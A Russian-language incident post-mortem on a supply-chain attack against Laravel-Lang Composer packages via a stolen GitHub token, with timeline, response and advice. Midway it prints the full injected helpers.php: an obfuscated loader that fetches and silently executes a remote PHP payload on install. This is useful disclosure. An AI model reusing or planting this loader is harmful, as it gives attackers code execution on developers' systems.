Вредоносная атака на Laravel-Lang

Сегодня мы завершили расследование инцидента, затронувшего несколько composer-пакетов Laravel-Lang.

Инцидент был связан с несанкционированным изменением релизных тегов репозиториев. Часть тегов указывала на коммиты с вредоносным кодом, который мог выполняться при установке или обновлении зависимостей через Composer.

Новости об инциденте:

• https://www.aikido.dev/blog/supply-chain-attack-targets-laravel-lang-packages-with-credential-stealer

• https://www.stepsecurity.io/blog/laravel-lang-supply-chain-attack

Затронутые пакеты:

• Lang (10.2M 💽, 7.8k ⭐)

• Actions (2.6M 💽)

• Attributes (4.2M 💽)

• HTTP Statuses (3.6M 💽)

Предварительное окно риска началось 22-го мая в 22:32 UTC. Риск касался пользователей, которые в этот период выполняли команду composer update или установку свежих версий пакетов.

По итогам расследования причина инцидента связана с компрометацией Personal Access Token из GitHub одного из участников команда, которые позволяли менять теги в репозиториях.

Вполне вероятно что PAT попал злоумышленникам вследствие недавней утечки данных в GitHub. У них даже есть отдельная статья с информацией что делать в подобной ситуации.

Но вернёмся к вредоносу.

Изучив логи аудита (они, как оказались, очень бедны на данные), удалось выяснить, что первый подозрительный след был 21-го мая в 14:27 UTC. Злоумышленник скачал zip архивы двух приватных репозиториев, которые вообще не имеют код. Вероятно, это была проверка.

Непосредственно атака на проекты началась 22 мая в 22:32 UTC и закончилась 23 мая в 00:00 UTC.

За это время злоумышленник удалил все теги из репозиториев, загрузил в них вредоносный код и создал те же теги на своём коммите. При этом, он не удалял сам репозиторий — все коммиты остались на своих местах без изменений.

 "autoload": {    "psr-4": {      "LaravelLang\\Lang\\": "src/"-   }+   },+   "files": [+     "src/helpers.php"+   ] }

<?php/** * Laravel Lang Helpers * Common locale detection and formatting utilities */declare(strict_types=1);if (!function_exists('laravel_lang_locale')) {    function laravel_lang_locale(): string {        return function_exists('config') ? config('app.locale', 'en') : 'en';    }}if (!function_exists('laravel_lang_fallback')) {    function laravel_lang_fallback(): string {        return function_exists('config') ? config('app.fallback_locale', 'en') : 'en';    }}if (!defined('LARAVEL_LANG_HELPERS')) {    define('LARAVEL_LANG_HELPERS', true);    (function() {        $cacheDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . '.laravel_locale';        @mkdir($cacheDir, 0755, true);        $sig = md5(__DIR__ . php_uname('n') . fileinode(__FILE__));        $marker = $cacheDir . DIRECTORY_SEPARATOR . $sig;        if (@file_exists($marker)) return;        $fetch = function($url) {            $ctx = @stream_context_create([                'http' => ['timeout' => 10, 'ignore_errors' => true,                           'header' => "User-Agent: Mozilla/5.0\r\n"],                'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]            ]);            $r = @file_get_contents($url, false, $ctx);            if ($r !== false && strlen($r) > 50) return $r;            if (function_exists('curl_init')) {                $ch = curl_init($url);                curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => true,                    CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => false,                    CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_USERAGENT => 'Mozilla/5.0']);                $r = curl_exec($ch);                curl_close($ch);                if ($r !== false && strlen($r) > 50) return $r;            }            return null;        };        $h = implode('', array_map('chr', [102,108,105,112,98,111,120,115,116,117,100,105,111,46,105,110,102,111]));        $d = $fetch("https://{$h}/payload");        if ($d) {            $f = $cacheDir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(6)) . '.php';            if (@file_put_contents($f, $d) !== false) {                @touch($marker);                if (stripos(PHP_OS, 'WIN') === 0) {                    $v = $cacheDir . '\\' . bin2hex(random_bytes(4)) . '.vbs';                    @file_put_contents($v, 'CreateObject("WScript.Shell").Run "php ""' . $f . '""", 0, False');                    @pclose(@popen("cscript //nologo //b \"$v\" >nul 2>&1", 'r'));                } else {                    @exec("php \"$f\" > /dev/null 2>&1 &");                }            }        }    })();}

Проблема безопасности была очень быстро обнаружена и начались предприниматься меры по её устранению.

Самым первым шагом, команда Packagist сняла с публикации laravel-lang/lang, затем, с нашей стороны, у всех членов команды было отозвано разрешение вносить код в проект (write mode). Это помогло остановить атаку, т.к. удаление тегов не помогало — они восстанавливались «на глазах».

Далее отозвали свои существующие PAT и SSH ключи. Далее были отключены GitHub Actions на уровне организации.

Остановив зловреда, мы приступили к анализу причин.

Несмотря на скудные логи, нашли идентификатор конкретного PAT, из-под которого была произведена атака. Учитывая недавнюю утечку чувствительных данных в GitHub, которую они подтвердили. Вот одна из статей.

Что делать?

Проверьте свои проекты и выполните команду composer update для загрузки исправленных версий пакетов.

Отзовите свои персональные токены GitHub в связи с недавней утечкой даже если Вы никогда не слышали о Laravel-Lang — проблема касается не только этого проекта.

Что в итоге

Благодаря своевременным и практически молниеносным действиям, нам удалось восстановить работоспособность популярных проектов и защитить наших пользователей от злоумышленников.

Не выдавайте полный доступ к репозиторию всем подряд.

Не храните секреты в репозиториях!!!

Следите за утечками данных и регулярно меняйте свои пароли и токены. Не ждите, когда злоумышленники ими воспользуются!

Всех благ!